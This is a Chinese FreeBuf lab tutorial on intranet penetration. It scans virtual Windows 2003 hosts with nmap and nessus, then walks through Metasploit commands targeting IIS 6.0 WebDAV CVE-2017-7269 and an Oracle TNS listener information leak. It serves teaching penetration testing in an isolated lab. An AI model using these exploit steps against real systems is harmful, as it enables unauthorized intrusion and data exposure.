freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

内网渗透漏洞利用
ATL实验室团队 2019-01-19 21:23:11 333752

查找漏洞信息并利用

我们在收集到漏洞信息以及服务器信息后,要在内网其他机器进行主机漏洞发现,并占据主机控制权限。首先我们要获取到主机的相关漏洞信息,可以通过nmap进行主机漏洞信息及版本探测。

实验环境:

虚拟攻击机:kali linux/10.10.10.138

虚拟被攻击服务器:windows2003/10.10.10.130和10.10.10.129

命令:nmap -- script nmap-vulners –sV <目标IP>

图片.png图片.png在找到端口服务版本以及其包含的漏洞信息后,我们可以尝试进行查找漏洞相关信息,看能否利用。

同时可以通过nessus进行端口扫描以及主机漏洞探查。

图片.png

例如:发现主机10.10.10.130主机为IIS6.0服务器,存在CVE-2017-7269漏洞。下面以该漏洞为实例进行利用

图片.png在metaspolit中iis_webdav_scstoragepathfromurl.rb模块可以进行IIS6_WebDAV远程代码执行漏洞利用。或者下载CVE2017-7269利用POC,将其存放到metaspolit模块下。我的模块路径在/opt/metasploit-framework/embedded/framework/modules/下。

Kali下首先启用metasploit:

命令:msfconsole

查找相关模块:

命令:search CVE2017-7269

使用CVE2017-7269 POC信息进行配置:

命令:use exploit/windows/iis/CVE2017-7269

如图所示:

图片.png使用set配置相关参数列表:

set RHOST 10.10.10.130(目的IP)

set LHOST 10.10.10.138(本机IP)

图片.png使用exploit执行,如图,没有session被创建后尝试利用其他漏洞。

尝试利用其他漏洞信息。

在nessus上发现有oracleTNS信息泄露。

图片.png尝试利用oracle TNS Listener Command Issuer

使用kali下输入命令msfconsole进入metasploit控制台,通过search查找oracle漏洞利用tnscmd,如图:进行配置

图片.png设置目标地址:

图片.png执行结果如下:

图片.png成功获取到目标信息。



# 内网渗透 # 漏洞利用
本文为 ATL实验室团队 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
凯信特安全团队
渗透实战
ATL实验室团队 LV.1
这家伙太懒了,还未填写个人描述!
  • 94 文章数
  • 100 关注者
带你走入CTF之路-杂项MISC(五)
2020-03-18
带你走入CTF之路-杂项MISC(四)
2020-03-16
带你走入CTF之路-加密Crypto(一)
2020-03-13
文章目录